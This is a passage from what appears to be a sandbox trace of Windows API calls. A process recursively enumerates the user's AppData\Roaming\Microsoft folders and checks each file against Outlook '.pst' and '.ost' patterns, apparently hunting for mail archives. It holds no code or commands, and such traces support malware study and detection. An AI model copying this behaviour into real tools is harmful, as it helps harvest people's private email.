(hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.942] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.942] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.942] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel", pszFile="XLSTART" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0250.942] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0250.942] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0f850 [0250.942] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.942] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.943] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.943] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0250.943] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0250.943] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0250.943] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0250.943] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0250.943] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.943] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0250.943] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0250.943] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0f850 [0250.943] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.943] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.943] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.943] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.943] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.943] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0250.943] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0250.943] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0fbb0 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.pst") returned 0 [0250.944] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ost") returned 0 [0250.944] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*.pst") returned 0 [0250.944] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*.ost") returned 0 [0250.944] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] PathMatchSpecW (pszFile="Microsoft Outlook.lnk", pszSpec="*.pst") returned 0 [0250.944] PathMatchSpecW (pszFile="Microsoft Outlook.lnk", pszSpec="*.ost") returned 0 [0250.944] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*.pst") returned 0 [0250.944] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*.ost") returned 0 [0250.944] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.944] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0250.944] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0250.944] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0feb0 [0250.944] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.945] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.945] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.945] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.945] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.945] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0250.945] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0250.945] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c103f0 [0250.945] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.945] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.945] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.945] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0250.945] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0250.945] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.945] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.945] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0250.945] PathCombineW (in: pszDest=0x235d9b0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0250.945] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0x5c0f970 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.pst") returned 0 [0250.946] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*.ost") returned 0 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] PathMatchSpecW (pszFile="Excel 2016.lnk", pszSpec="*.pst") returned 0 [0250.946] PathMatchSpecW (pszFile="Excel 2016.lnk", pszSpec="*.ost") returned 0 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*.pst") returned 0 [0250.946] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*.ost") returned 0 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*.pst") returned 0 [0250.946] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*.ost") returned 0 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.946] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.946] PathMatchSpecW (pszFile="OneNote 2016.lnk", pszSpec="*.pst") returned 0 [0250.946] PathMatchSpecW (pszFile="OneNote 2016.lnk", pszSpec="*.ost") returned 0 [0250.946] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.947] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.947] PathMatchSpecW (pszFile="Outlook 2016.lnk", pszSpec="*.pst") returned 0 [0250.947] PathMatchSpecW (pszFile="Outlook 2016.lnk", pszSpec="*.ost") returned 0 [0250.947] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.947] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.947] PathMatchSpecW (pszFile="PowerPoint 2016.lnk", pszSpec="*.pst") returned 0 [0250.947] PathMatchSpecW (pszFile="PowerPoint 2016.lnk", pszSpec="*.ost") returned 0 [0250.947] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.947] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.947] PathMatchSpecW (pszFile="Project 2016.lnk", pszSpec="*.pst") returned 0 [0250.947] PathMatchSpecW (pszFile="Project 2016.lnk", pszSpec="*.ost") returned 0 [0250.947] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.947] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.947] PathMatchSpecW (pszFile="Visio 2016.lnk", pszSpec="*.pst") returned 0 [0250.947] PathMatchSpecW (pszFile="Visio 2016.lnk", pszSpec="*.ost") returned 0 [0250.947] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 1 [0250.947] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.947] PathMatchSpecW (pszFile="Word 2016.lnk", pszSpec="*.pst") returned 0 [0250.947] PathMatchSpecW (pszFile="Word 2016.lnk", pszSpec="*.ost") returned 0 [0250.947] FindNextFileW (in: hFindFile=0x5c0f970, lpFindFileData=0x235d760 | out: lpFindFileData=0x235d760) returned 0 [0250.947] FindClose (in: hFindFile=0x5c0f970 | out: hFindFile=0x5c0f970) returned 1 [0250.947] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0250.947] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0250.947] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.947] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.947] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*.pst") returned 0 [0250.947] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*.ost") returned 0 [0250.947] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0250.947] FindClose (in: hFindFile=0x5c0fbb0 | out: hFindFile=0x5c0fbb0) returned 1 [0250.947] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.948] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.948] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0250.948] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0250.948] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0fbb0 [0251.208] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.208] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.208] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.208] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.208] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.208] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0251.208] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0251.208] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0f2b0 [0251.220] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.220] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.220] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.220] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.220] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.220] FindNextFileW (in: hFindFile=0x5c0fbb0, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.220] FindClose (in: hFindFile=0x5c0fbb0 | out: hFindFile=0x5c0fbb0) returned 1 [0251.220] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.220] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0251.220] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.220] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.220] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC" [0251.220] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*" [0251.221] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c103f0 [0251.221] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.221] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.221] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.221] FindNextFileW (in: hFindFile=0x5c103f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.221] FindClose (in: hFindFile=0x5c103f0 | out: hFindFile=0x5c103f0) returned 1 [0251.221] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.221] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.221] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="MS Project" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project" [0251.221] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0251.221] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0feb0 [0251.221] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.221] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.221] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.221] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0251.221] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.221] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="16" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0251.221] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0251.221] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5c0f850 [0251.222] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.222] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.222] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.222] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0251.222] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.222] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="en-US" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0251.222] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0251.222] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0f2b0 [0251.224] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.224] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.224] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.224] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0251.224] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0251.224] PathMatchSpecW (pszFile="Global.MPT", pszSpec="*.pst") returned 0 [0251.224] PathMatchSpecW (pszFile="Global.MPT", pszSpec="*.ost") returned 0 [0251.224] FindNextFileW (in: hFindFile=0x5c0f2b0, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0251.224] FindClose (in: hFindFile=0x5c0f2b0 | out: hFindFile=0x5c0f2b0) returned 1 [0251.224] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0251.224] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0251.225] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0251.225] FindClose (in: hFindFile=0x5c0feb0 | out: hFindFile=0x5c0feb0) returned 1 [0251.225] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0251.225] WaitForSingleObject 